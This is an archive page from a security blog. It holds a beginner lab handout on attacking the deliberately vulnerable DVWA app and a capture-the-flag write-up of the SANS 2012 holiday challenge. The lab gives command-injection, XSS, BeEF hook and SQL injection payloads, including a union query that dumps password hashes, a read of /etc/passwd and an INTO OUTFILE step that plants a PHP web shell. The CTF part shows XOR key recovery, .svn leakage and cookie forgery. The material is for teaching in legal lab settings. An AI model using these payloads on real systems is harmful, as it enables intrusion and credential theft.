Category Archives: Uncategorized

Hackery fun in Regina

If you happen to be in or around Regina, there are two opportunities to join me for some hackery fun.

1. I will be mentoring SANS Security 504: Hacker Techniques, Exploits & Incident Handling. I am really looking to forward to this class. See http://www.sans.org/mentor/class/sec504-regina-10sep2014-cliff-janzen for the details.

2. I will also be doing a presentation for the Regina Technology Community on web application security. I will be covering a quick intro to web security, a bit about OWASP Top 10 then demos of command and sql injection, XSS and some crypto.  See http://www.regina-technology-community.ca/ for more information.

SaskHackers

I recently had the honour of introducing some very talented students to world of ethical web hacking. (see saskhackers.com). Thank you to Justin and Austin, the sponsors, and a special thank you to the students that gave up a Saturday to hack.

Here are the lab notes that we used:

What You Need

  • The Web Security Dojo virtual machine.
  • Any computer that can run a virtual machine
  • Curiosity

Copying the Virtual Machine to the Hard Drive (if following along at home, see NOTE at the end of this post)

1. Copy the “Dojo_2.1” folder from the virtual machine to a folder on the VMs drive.

2. In VMWare, click on file, open and browse to the folder.

3. Select the file dojo2.vmx and click on open (may have to take ownership)

4. Start the virtual machine (host only networking)

Starting DVWA

5. Web Security Dojo is a Ubuntu virtual machine with autologon enabled. Once it has booted, click on Firefox.

6. Select the DVWA link

clip_image002

7. Type in:

Username admin

Password password

8. Check the security settings for DVWA by selecting the DVWA Security button on the left, and set the security to low and click the Submit button.

clip_image003

Features of DVWA

DVWA, as described by its author is:

“A PHP/MySQL web application that is damn vulnerable. Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and aid teachers/students to teach/learn web application security in a class room environment.”

Command Execution

1. Click on the Command Injection link.

2. Enter an address of

127.0.0.1

3. Click the Submit button.

4. The screen shows the results of executing the ping 127.0.0.1 command.
clip_image004

5. Enter an address of

127.0.0.1;ls

6. Click the Submit button.

7. Other examples will be provided

 

Cross-Site Scripting (XSS)

1. Click on the XSS Reflected link

2. Type in the value

Homer

3. Click the Submit button.

clip_image005

4. Type in the value

Homer <scriprt> alert(‘El Barto was here’);</script>

5. Click the Submit button.

clip_image006

6. Other examples will be provided

BEEF

1. Start BeEF by launching it from the menu as shown below.
clip_image007

2. Type in:

Username beef

Password beef

3. Go back to DVWA XSS reflected

4. Enter a “name” of:

Homer <script src=”http://127.0.0.1:3001/hook.js”?></script>

5. Click the Submit button.

6. Go back to BEEF Control Panel

7. A new target should appear
clip_image008

8. Click on Commands, then Browser, then Domains and select the Create Prompt Dialog. For the Prompt text: enter the value:
Please re-enter your password
clip_image010

9. Click Execute

10. Go back to your DVWA tab.

11. Other examples will be provided

SQL Injection

1. Click on the SQL Injection link.

2. Enter a “User ID” of:

3

3. Click the Submit button.

4. Enter a “User ID” of:

3′

5. Click the Submit button.

6. An error screen appears
clip_image011

7. Click the Back button

8. Enter a “User ID” of:

3′ or 1=1 #

9. Click the Submit button
clip_image012

Doing more

10. Enter the following for “User ID, one at a time and take note of the results:

‘ order by 1 #

‘ order by 2 #

‘ order by 3 #

11. Enter the following for “User ID” and take note of the results:
‘ union select 1,2 #
‘ union all select 1,@@VERSION #
‘ union all select user(),database() #

union all select table_name,null from information_schema.tables where table_schema=database() #

‘ union all select column_name,null from information_schema.columns where table_schema=database() #

12. Let’s get the users and passwords. Enter the following for the “User ID”

‘ union all select user, password from dvwa.users #

Even more

13. Enter the following for “User ID, one at a time and take note of the results:

‘ union all select load_file(‘/etc/passwd’),null #

14. Enter the following for “User ID, one at a time and take note of the results:

‘union all select ‘test’,’123′ INTO OUTFILE ‘/var/www/dvwa/sqlwrite/elbarto.txt’ #

15. In a new FireFox tab, browse to the following location:

http://127.0.0.1/dvwa/sqlwrite/elbarto.txt

16. Enter the following for “User ID, one at a time and take note of the results:

‘union all select ”,'<?php system($_GET[“cmd”]); ?>’ INTO OUTFILE ‘/var/www/dvwa/sqlwrite/myshell.php’ #

17. In a new FireFox tab, browse to the following location:

http://127.0.0.1/dvwa/sqlwrite/myshell.php?cmd=ls

clip_image013

 

Keep learning

http://hackthissite.org

http://samurai.inguardians.com/

http://sourceforge.net/projects/mutillidae/ (and the excellent tutorials at http://www.youtube.com/user/webpwnized)

Web hacking and More

http://vulnhub.com/

http://www.securitytube.net/

——————————————————————————–

NOTE: To do these labs at home:

Download the Web Security Dojo from

http://sourceforge.net/projects/websecuritydojo/files/)

Then make the following change to make it even more vulnerable.

Create a folder that MySql can write to.

sudo mkdir /var/www/dvwa/sqlwrite

chown –R mysq:www-datal /var/www/dvwa/sqlwrite

Then adjust apparmour to allow MySQL to write files to the folder. To do this, type in

sudo nano /etc/apparmor.d/usr.sbin.mysqld

and enter /var/www/dvwa/sqlwrite r, and  /var/www/dvwa/sqlwrite/* rw,* near the bottom like so:


/usr/sbin/mysqld {

/var/log/mysql/ r,
/var/log/mysql/* rw,
/var/run/mysqld/mysqld.pid w,
/var/run/mysqld/mysqld.sock w,
    /var/www/dvwa/sqlwrite r,
/var/www/dvwa/sqlwrite/* rw,

}

Once added, press ctrl-x, enter Y and press enter to save and exit the file.

Then reload apparmor by typing

# sudo /etc/init.d/apparmor reload

Christmas Hack 2012

I attempted Ed Skoudis’ Christmas challenge again this year (SANS – http://pen-testing.sans.org/holiday-challenge/2012).While my submission was not selected (you should read/watch the winning solutions), I decided I would share it anyways.
I had a lot of fun doing the challenge and am thankful to Ed, Tim and anyone else that was involved in making the challenge.

———————————————————————————
This is the story of
title

***Images Copyright Warner’s Animation (with a slight modification by me)

And the story of how I, a GIAC certified security professional saved Christmas.

image004

Background

The trouble started one day when Santa, feeling depressed, announced he was taking the year off. Mrs. Clause soon had a plan on how to lift Santa’s spirits, which somehow turned into a full on supervisory control and data acquisition (SCADA) penetration testing challenge between the Miser brothers.

image006

The brothers were having a great time, sharpening both their offensive and defensive security skills, until Mother Nature found out about the competition and grounded the boys.

See http://pen-testing.sans.org/holiday-challenge/2012 for the full story.

Unfortunately, Mother Nature didn’t realize that by grounding the boys, she was ruining Mrs. Clause’s plans to save Christmas by having it snow in Southland and warm in the North Pole.

Mrs. Clause came to me and asked if I had any ideas on how we could prevent a year without Santa!

I approached the Misers and they agreed that if I could reach all five levels and answer some questions for them they would carry on with the plan and after the rules of engagement and scope were signed off, the hack was underway.

Executive Summary: Miser Brothers’ Questions and Answers

  1. Where did you find the remainder of Snow Miser’s Zone 1 URL?
    In the picture that Snow Miser tweeted, it could be seen in the reflection of the ice cold drink.
  2. What is the key you used with steghide to extract Snow Miser’s Zone 2 URL? Where did you find the key?
    The key was IceIceBaby! And was found in the user comment tag of the off.jpg extended metadata.
  3. On Snow Miser’s Zone 3 page, why is using the same key multiple times a bad idea?
    If you have known plain text and cipher text you can derive the key that was used to encrypt the plaintext. If that same key was used to encode other plaintext, it can be used to decode the cipher text. (Plaintext XOR Key = Ciphertext,  Ciphertext XOR Key = Plaintext, Plaintext XOR Ciphertext = Key)
  4. What was the coding error in Zone 4 of Heat Miser’s site that allowed you to find the URL for Zone 5?
    A PHP header re-direct does not stop the HTTP request from executing the rest of the PHP code and any commands after the redirect will still run. Any results from the code execution will be returned to the client’s browser. The proper way to program the re-direct is to include the exit() command to stop all further PHP code execution of the page.
  5. How did you manipulate the cookie to get to Zone 5 of Heat Miser’s Control System?
    The cookies were ASCII encoded MD5 hashed values. By substituting the value ASCII(MD5(1)) for the cookie, access was granted.
  6. Please briefly describe the process, steps, and tools you used to conquer each zone, including all of the flags hidden in the comments of each zone page. See Exploitation Narrative. 

Exploitation Narrative

Information Gathering

The first step in any penetration test is to gather as much information about the targets as possible. I look at the Miser brothers’ twitter feeds and Mother Nature’s as well for good measure. I downloaded all the pictures and the backup that Heat Miser somehow obtained of Snow Misers Android device.

snowmiser.counterhack.com

I started off this level, with the level that all things start with, 0. Not a very hard level, just browsed to the snowmiser.counterhack.com and was redirected to http://snowmiser.counterhack.com/zone-0-11698563-7582-4A51-B567-B4710BBE783F/ . I then clicked on view source in my browser and collected the first flag:

<!– The flag for this level is 3b5a630fc67251aa5555f4979787c93f  –>

Looking at the page, Snow Miser mentions the next level starts with

zone-1-D2E31380-50E6-4869-8A85-XXXXXXXXXXXX

Well, I thought to myself, I guess Dirbuster and Burp Intruder are out. I wonder if Snow Miser gave away any hints.

I recall that there was a picture in Snow Miser’s twitter feed and open it up. When I can finally take my eyes off of the wonderful book in the picture, I focus in on the ice cold glass and see a reflection.

Using my ultra-powerful imaging tool MSPaint, I rotate the image and there I see the some numbers:

image006

 

F9CDB3AF6226

I quickly go back to my browser and go to the link zone-1-D2E31380-50E6-4869-8A85-F9CDB3AF6226. Success. I clicked on view source and get the flag:

<!– The flag for this level is 38bef0b61ba8edda377b626fe6708bfa –>

Zone-1 says:

“One of my minions, who has been turned into a snowman, messed up and changed the URL for Zone 2. If you have access to this level you can analyze the images and access the next zone.”

I download the on.png, flick the controls to off and download the off.jpg and inspect them with exiftool.

exiftool off.jpg

ExifTool Version Number         : 7.89
File Name                   : off.jpg
Directory                    : .
File Size                       : 64 kB

…..
User Comment          : IceIceBaby!

Interesting. I wonder if they tried to hide something in the off.jpg.

I run steghide:
steghide –extract –passphrase IceIceBaby! -sf off.jpg
then look at txt file it generated
zone-2-6D46A633-25D7-42C8-AF94-8E786142A3E3

I paste that into my browser and collect the flag:

<!– The flag for this level is b8231c2bac801b54f732cfbdcd7e47b7 –>

There didn’t seem to be any clues on the page to get me to the next level, so I went back to my recon notes. Oh yeah…the Android backup.

I recall that in the SANS 575 course we were shown that there is a lot of good information in .db files, which are often sqlite format. There are a myriad of ways to go through (like SQLite Database Browser, Python with sqlite3) but I stick with a little trick I learned in the Windows Command Line Kung Fu class:

c:\android.data\data>findstr /s “counterhack” *.db
and get the following result back
Snow Miser SnowTalk HMI for the Global Chiller Control System – Zone 3 http://snowmiser.counterhack.com/zone-3-EAB6B031-4EFA-49F1-B542-30EBE9EB3962

I browse to the site and collect the flag:

<!– The flag for this level is 08ba610172aade5d1c8ea738013a2e99 –>

(By the way…did you see how this backup was done? Hint: look in the bersersker.android.apps.sshdroid\home folder)

The zone-3 page says:

To verify your key you can check the previous Zone 4 URL:
zone-4-F7677DA8-3D77-11E2-BB65-E4BF6188709B
20d916c6c29ee53c30ea1effc63b1c72147eb86b998a25c0cf1bf66939e8621b3132d83abb1683df619238

The new Zone 4 encrypted string is: 20d916c6c29ee54343e81ff1b14c1372650cbf19998f51b5c51bf66f49ec62184034a94fc9198fa9179849

Josh explaining crypto starts echoing in my head….known plain text…known cipher text… XOR…same key… and I know what to do.

I re-read one of my favorite posts from one of my favorite blogs, http://blog.commandlinekungfu.com/2011/01/episode-132-enigma.html, and I follow the post by first ASCII hex encoding the old link:

python
import binascii
print binascii.b2a_hex(“zone-4-F7677DA8-3D77-11E2-BB65-E4BF6188709B”)
and set this into a variable

  • oldzone4=(0x7a 0x6f 0x6e 0x65 0x2d 0x34 0x2d 0x46 0x37 0x36 0x37 0x37 0x44 0x41 0x38 0x2d 0x33 0x44 0x37 0x37 0x2d 0x31 0x31 0x45 0x32 0x2d 0x42 0x42 0x36 0x35 0x2d 0x45 0x34 0x42 0x46 0x36 0x31 0x38 0x38 0x37 0x30 0x39 0x42)

Then take the verify key from Snow Misers web page,

zone4verify=(0x20 0xd9 0x16 0xc6 0xc2 0x9e 0xe5 0x3c 0x30 0xea 0x1e 0xff 0xc6 0x3b 0x1c 0x72 0x14 0x7e 0xb8 0x6b 0x99 0x8a 0x25 0xc0 0xcf 0x1b 0xf6 0x69 0x39 0xe8 0x62 0x1b 0x31 0x32 0xd8 0x3a 0xbb 0x16 0x83 0xdf 0x61 0x92 0x38)

and I get the “magic” key using a the command from the Command Line Kung Fu article

for ((i=0; $i < ${#oldzone4[*]}; i++)); do printf “%02X” $((${oldzone4[$i]} ^ ${zone4verify[$i]}));  done

5AB678A3EFAAC87A07DC29C8827A245F273A8F5CB4BB1485FD36B42B0FDD4F5E05709E0C8A2EBBE851AB7A

Note: If you tried the Hal’s version from the blog post like I did you might have stayed up way past hot chocolate time trying to figure out why it didn’t work, then eventually try Tim’s PowerShell script which works as expected and then finally realize that Hal’s command skips the leading 0. To get the leading 0’s, simply add a %02X to format the output.

Now with that “magic” key, there is no need to actually figure out the plain text encryption password. Thanks to the associative and commutative power of XOR (a XOR b = c, c XOR b = a , b XOR c = a) I take that “magic” key

magickey=(0x5a 0xb6 0x78 0xa3 0xef 0xaa 0xc8 0x7a 0x07 0xdc 0x29 0xc8 0x82 0x7a 0x24 0x5f 0x27 0x3a 0x8f 0x5c 0xb4 0xbb 0x14 0x85 0xfd 0x36 0xb4 0x2b 0x0f 0xdd 0x4f 0x5e 0x05 0x70 0x9e 0x0c 0x8a 0x2e 0xbb 0xe8 0x51 0xab 0x7a)

And the verify for the new link from the Snow Misers notes

newzone4=(0x20 0xd9 0x16 0xc6 0xc2 0x9e 0xe5 0x43 0x43 0xe8 0x1f 0xf1 0xb1 0x4c 0x13 0x72 0x65 0x0c 0xbf 0x19 0x99 0x8f 0x51 0xb5 0xc5 0x1b 0xf6 0x6f 0x49 0xec 0x62 0x18 0x40 0x34 0xa9 0x4f 0xc9 0x19 0x8f 0xa9 0x17 0x98 0x49)

XOR them together

for ((i=0; $i < ${#newzone4[*]}; i++)); do printf “%02X” $((${newzone4[$i]} ^ ${magickey[$i]}));  done

7A6F6E652D342D39443436393336372D423630452D344530382D424446312D464544374343373441463333

And converted that to ascii:

python
import binascii
print binascii.a2b_hex(“7A6F6E652D342D39443436393336372D423630452D344530382D424446312D4645 44374343373441463333”)
zone-4-9D469367-B60E-4E08-BDF1-FED7CC74AF33

I pasted that into my browser and picked up the flag for level 4:

<!– The flag for this level is de32b158f102a60aba7de3ee8d5d265a –>

For zone 5, Snow Miser touts a new one-time password (OTP) function to keep everyone out. I recall Heat Miser mentioning something about .svn from my initial information gathering and follow the steps laid out by Tim Medin http://pen-testing.sans.org/blog/pen-testing/2012/12/06/all-your-svn-are-belong-to-us”

wget http://snowmiser.counterhack.com/zone-5-89DE9B26-CF7D-4B07-88DE-7A2F0A7B16FE/.svn/wc.db
–2012-12-11 11:24:03–  http://snowmiser.counterhack.com/zone-5-89DE9B26-CF7D-4B07-88DE-7A2F0A7B16FE/.svn/wc.db
Resolving snowmiser.counterhack.com… 204.51.94.72
Connecting to snowmiser.counterhack.com|204.51.94.72|:80… connected.
HTTP request sent, awaiting response… 200 OK
Length: 34816 (34K) [text/plain]
Saving to: `wc.db’

100%[============================================>] 34,816      47.8K/s   in 0.7s
2012-12-11 11:24:06 (47.8 KB/s) – `wc.db’ saved [34816/34816]

I look through the database
sqlite3 wc.db ‘select local_relpath, “.svn/pristine/” || substr(checksum,7,2) || “/” || substr(checksum,7) || “.svn-base” as alpha from NODES;’|
noaccess.php|.svn/pristine/41/4134e0e954d144ed932fd639b5a897f9ad47fff9.svn-base
index.php|.svn/pristine/7d/7d63810b0da679648fc20b4f1c84680ac08ec872.svn-base

Then go grab the file to examine how the OTP function works

wget http://snowmiser.counterhack.com/zone-5-89DE9B26-CF7D-4B07-88DE-7A2F0A7B16FE/.svn/pristine/7d/7d63810b0da679648fc20b4f1c84680ac08ec872.svn-base

The OTP takes the current time + or – a minute or two and hashes that with a common seed. I check to make sure the time on my machine is correct and set up my own PHP page to do the same OTP function.

alt;?php

function generate_otp($time) {
$pass = sha1(“$time 7998f77a7dc74f182a76219d7ee58db38be3841c”);
return($pass);
}

$currenttime =  date(‘Y-m-d H:i’);
echo $currenttime;
echo “Here is your OTP: “;
echo generate_otp($currenttime);
I access my local copy and access the site to retrieve the flag:

<!– The flag for this level is 3ab1c5fa327343721bc798f116be8dc6 –>

image008
Snow Miser: Mission Complete

heatmiser.conterhack.com

Just like with Snow Miser I started off with level 0. Browse to the heatmiser.counterhack.com and you get redirected and by looking at the source, I get the first flag:

<!– The flag for this level is 1732bcff12e6550ff9ea44d594001418 –>

Also on the page is a note:

We had a security concern where the Zone 1 URL ended up in search engine results. We added a file to prevent the search engines from caching these pages. The system is now secure an no unauthorized users have access to the URL.

Right away, I recall Kevin in the SANS 542 class telling us that a well behaved search engine will look at for a file named robots.txt and follow the directions in it. If it says to “Disallow: /somelink”, the web crawler will not crawl that link. But, Kevin says, a penetration tester should not be well behaved search engines, and always look at the robots.txt file. I access http://heatmiser.counterhack.com/robots.txt and see

User-agent: *
Disallow: /zone-1-E919DBF1-E4FA-4141-97C4-3F38693D2161
Disallow: /zone-2-*
Disallow: /zone-3-*
Disallow: /zone-4-*
Disallow: /zone-5-*

I then goto http://heatmiser.counterhack.com/zone-1-E919DBF1-E4FA-4141-97C4-3F38693D2161 and capture the flag:

<!– The flag for this level is d8c94233daef256c42bb95bd61382e02 –>

While looking at the source I see something interesting.

p>We had an issue with
<!– redacted, too many people clicked on the link and took it offline
<a href=”/zone-2-761EBBCF-099F-4DB0-B63F-9ADC61825D49″>Zone 2</a>
–>
Zone 2 and we had to temporarily remove the link.

Can it be so simple. Did someone actually think that commenting out something that is then put in the hands of an end user would be safe?

Yep, they did. I browse to http://heatmiser.counterhack.com/zone-2-761EBBCF-099F-4DB0-B63F-9ADC61825D49/ and collect the flag:

<!– The flag for this level is ef963731de7e886226fe4a6a6c2971f1 –>

There aren’t many hints on what to access the next level, so it’s back to re-examining the data from the information gathering stage.

I come across the comment by Snow Miser about transparency and look at the picture that Heat Miser posted on Twitter. By closely inspecting the picture, you can see the link in a window beneath the Metasploit console window.

image010

I browse to zone-3-83FEE8BE-B1C6-4395-A56A-BF933FC85254 and retrieved the flag:

<!– The flag for this level is 0d524fb8d8f9f88eb9da5b286661a824 –>

To access zone 4 I clicked on the link provided on level 3. Right away, I got taken to a noaccess.php page. I go back to my Burp session (because I always surf with Burp) and look to see if there is a cookie or other variables that I can tamper with, but instead see that two pages were returned. Curious.

I setup Burp to intercept requests and responses then click the link again.  First click gets a 302 response, but looking at the response, specifically the <div id=”content”> section, you can clearly see that this is not the page that was intended.

The next request then returns the noaccess.php page.

Now I understand Snow Miser’s Tweet:

Nice job Fire-for-Brains!http://memegenerator.net/instance/31429299 …

Heat Miser must have forgot to exit() after the redirect and the valid page was sent in addition to the redirect. I go back to the first page returned and in the content section I see

<h3><p>Current Access Level – <strong>Zone 4</strong></p></h3>

Link to <a href=”/zone-5-15614E3A-CEA7-4A28-A85A-D688CC418287/”>Zone 5</a>

I browse to that location and retrieve the flag:

<!– The flag for this level is e3ae414e6d428c3b0c7cff03783e305f –>

Accessing the zone-5 link again redirects to a noaccess.php.

I look in Burp, no hints from the redirector this time, but there is a cookie sent with the value UID=b8c37e33defde51cf91e1e03e51657da

Once again I consult my notes from information gathering. There was a Tweet about 1001 and cookies from Snow Miser. Hmm

In Burp I switch to the Decoder tab. Type 1001 in, do an MD5 hash and then ASCII encode it. The result is b8c37e33defde51cf91e1e03e51657da. The cookie being sent is the value ASCII(MD5(1001)).

Quite often, administration ids are numbered 0,1, 100,101, 1000 or 1001 so I try 0 and put the ASCII encoded MD5 value in for the uid cookie, no luck.

I try 1, which when MD5 hashed and ASCII encoded is c4ca4238a0b923820dcc509a6f75849b. Success. I pick up the flag:

<!– The flag for this level is f478c549e37fa33467241d847f862e6f —>

image012

Heat Miser: Mission Complete

Epilogue

I wrote up the report and handed it to Mrs. Clause for QA. With some minor changes, the report was sent to the Miser brothers who signed off on the test and lived up to their agreement.

Santa was soon back in the Christmas spirit and Christmas was saved for another year. I even got the day off.

image016

Hello world!

Welcome. This is my first post the new site somethingsomethingsecurity.com which replaces the much longer url of my old site  infosecandotherstuff.blogspot.com.

Hopefully I will be more diligent with updating this site.

Wow…has it been that long

In typical blogger fashion, I have let this slip to the bottom of my list. Also in typical Blogger fashion, I am now promising that I am going to post more.

Not sure if you can tell from the past posts, but I did put a lot of work into making sure everything worked which meant a little longer publishing cycle.

I am going to try to make it a little more “off the cuff”. Future posts may not be quite as detailed of follow any certain format.

I have a variety of things queued up that I will be publishing over the next while. Some customizing Backtrack tips, exploration of tools and targets in Samurai WTF  and some short reviews of books (mostly technical).

Speaking of Samurai WTF….I will be (hopefully) mentoring SANS Security 542 Web App Penetration Testing and Ethical Hacking in beautiful down town Regina…see http://www.sans.org/info/97196.and keep watching the blog for updates.